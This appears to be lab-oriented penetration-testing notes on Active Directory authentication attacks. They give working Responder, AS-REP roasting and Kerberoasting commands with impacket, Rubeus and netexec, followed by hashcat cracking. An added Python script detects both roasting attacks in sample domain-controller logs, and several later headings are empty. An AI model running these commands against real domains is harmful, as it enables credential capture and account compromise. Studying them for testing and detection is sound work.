Attacking Authentication

Here we will discuss different types of attacks which might enable us to authenticate as a domain user and gain initial access.


Important Issues

KRB_AP_ERR_SKEW (Clock skew too great)

A common issue when attacking Kerberos is that our clock needs to match the target's clock (the default tolerance is five minutes). When working from a VM, automatic time synchronization is usually enabled, which keeps overwriting any time we set manually.

timedatectl set-ntp 0

The command above disables automatic NTP time synchronization on the VM.

sudo ntpdate -u 10.10.10.100

The command above sets our clock to the time reported by the specified target (the domain controller).


Responder

If we find a form which seems to connect to a server and we can change the server address, we might be able to capture hashes or credentials. For this we will use Responder.

sudo responder -I tun0

There are many options we can use with Responder. Above is the most basic use: listen on the tun0 interface.


ASREPRoast

For the attack to succeed we need valid usernames, which we check for the "Do not require Kerberos preauthentication" attribute.

impacket-GetNPUsers target.htb/ -usersfile users.txt -format hashcat -outputfile asrep.hash

We can also use Rubeus to execute the same attack.

Rubeus.exe asreproast /format:hashcat /outfile:asrep.hash

Once we have retrieved the hash we can crack it (hashcat mode 18200 is Kerberos 5 AS-REP etype 23) using the following command:

hashcat -m 18200 asrep.hash /usr/share/wordlists/rockyou.txt

Now we should have the password for the hash.


Kerberoasting

To abuse Kerberoasting we need an Active Directory account that has a Service Principal Name ("SPN") set.

An SPN is a unique identifier of a service instance. Kerberos authentication uses SPNs to associate a service instance with a service sign-in account. Doing so allows a client application to request service authentication for an account even if the client doesn't know the account name.

In a Kerberoasting attack an authenticated user requests a Kerberos service ticket (TGS) for an SPN. The retrieved TGS is encrypted with a key derived from the service account's password, so it can be cracked offline.

We have many tools to perform Kerberoasting.

impacket

GetUserSPNs.py test.lab/cub3:password -dc-ip 10.10.10.100 -request

Rubeus

Rubeus.exe kerberoast

netexec

netexec ldap 10.10.10.100 -u cub3 -p password --kerberoasting roast.txt

After we have retrieved the hash we use hashcat to brute-force the password (mode 13100 is Kerberos 5 TGS-REP etype 23).

Cracking

hashcat -m 13100 roast.txt /usr/share/wordlists/rockyou.txt

We should now have the password and access to some new information.
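Both of the attacks above leave a trace on the domain controller: AS-REP roasting shows up as a successful 4768 (TGT request) with PreAuthType 0, and Kerberoasting shows up as a burst of 4769 (service ticket request) events from one account, typically with RC4-HMAC (0x17) encryption because that is what the cracking tools ask for. The following is an added example, not part of the original notes, that runs those two rules over constructed, simplified key=value audit records (the field names follow the Windows events, the layout does not). The account names, addresses and the threshold of three services are assumptions for the sample.

```python
"""Flag Kerberos roasting indicators in constructed DC audit records.

Added example. Real DC events: 4768 carries PreAuthType (0 = no pre-auth),
4769 carries TicketEncryptionType (0x17 = RC4-HMAC). The sample below uses a
constructed key=value layout, not the real Windows XML event format.
"""
from collections import defaultdict

RC4_HMAC = "0x17"

# Constructed sample: one legitimate logon, one AS-REP without pre-auth,
# three RC4 service tickets for one user, and normal AES traffic from another.
SAMPLE_EVENTS = """\
EventID=4768 TargetUserName=cub3 IpAddress=10.10.10.50 PreAuthType=2 Status=0x0
EventID=4768 TargetUserName=svc_backup IpAddress=10.10.10.50 PreAuthType=0 Status=0x0
EventID=4769 TargetUserName=cub3@TEST.LAB ServiceName=MSSQLSvc IpAddress=10.10.10.50 TicketEncryptionType=0x17 Status=0x0
EventID=4769 TargetUserName=cub3@TEST.LAB ServiceName=svc_http IpAddress=10.10.10.50 TicketEncryptionType=0x17 Status=0x0
EventID=4769 TargetUserName=cub3@TEST.LAB ServiceName=svc_sql IpAddress=10.10.10.50 TicketEncryptionType=0x17 Status=0x0
EventID=4769 TargetUserName=alice@TEST.LAB ServiceName=WS01$ IpAddress=10.10.10.51 TicketEncryptionType=0x12 Status=0x0
EventID=4769 TargetUserName=alice@TEST.LAB ServiceName=krbtgt IpAddress=10.10.10.51 TicketEncryptionType=0x12 Status=0x0
"""


def parse_event(line):
    """Split one 'key=value key=value ...' record into a dict."""
    fields = {}
    for token in line.split():
        key, _, value = token.partition("=")
        fields[key] = value
    return fields


def parse_events(text):
    """Parse all non-empty records from the sample text."""
    return [parse_event(line) for line in text.splitlines() if line.strip()]


def asrep_roast_candidates(events):
    """Accounts whose TGT request succeeded with PreAuthType 0.

    Such accounts do not require pre-authentication, so their AS-REP can be
    cracked offline; each hit is an account to remediate (enable pre-auth)."""
    return sorted({
        e["TargetUserName"]
        for e in events
        if e.get("EventID") == "4768"
        and e.get("PreAuthType") == "0"
        and e.get("Status") == "0x0"
    })


def kerberoast_candidates(events, min_services=3):
    """Requesters that pulled RC4 service tickets for several user accounts.

    Machine accounts (ending in '$') and krbtgt are excluded: RC4 tickets for
    those are not crackable service-account material, and krbtgt entries are
    TGT renewals. Only requesters at or above min_services are reported."""
    per_requester = defaultdict(set)
    for e in events:
        if e.get("EventID") != "4769" or e.get("Status") != "0x0":
            continue
        if e.get("TicketEncryptionType") != RC4_HMAC:
            continue
        service = e.get("ServiceName", "")
        if service.endswith("$") or service.lower() == "krbtgt":
            continue
        per_requester[e["TargetUserName"]].add(service)
    return {
        user: sorted(services)
        for user, services in per_requester.items()
        if len(services) >= min_services
    }


if __name__ == "__main__":
    evts = parse_events(SAMPLE_EVENTS)
    print("AS-REP roastable accounts:", asrep_roast_candidates(evts))
    print("Kerberoasting suspects:", kerberoast_candidates(evts))
```

The RC4 filter is the classic signal because the default Kerberoasting tools request etype 23 tickets; in an environment where service accounts are AES-only the encryption check should be relaxed and the per-requester count over a short window becomes the main rule.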


Pass-The-Ticket


Silver Ticket


Golden Ticket


DCSync
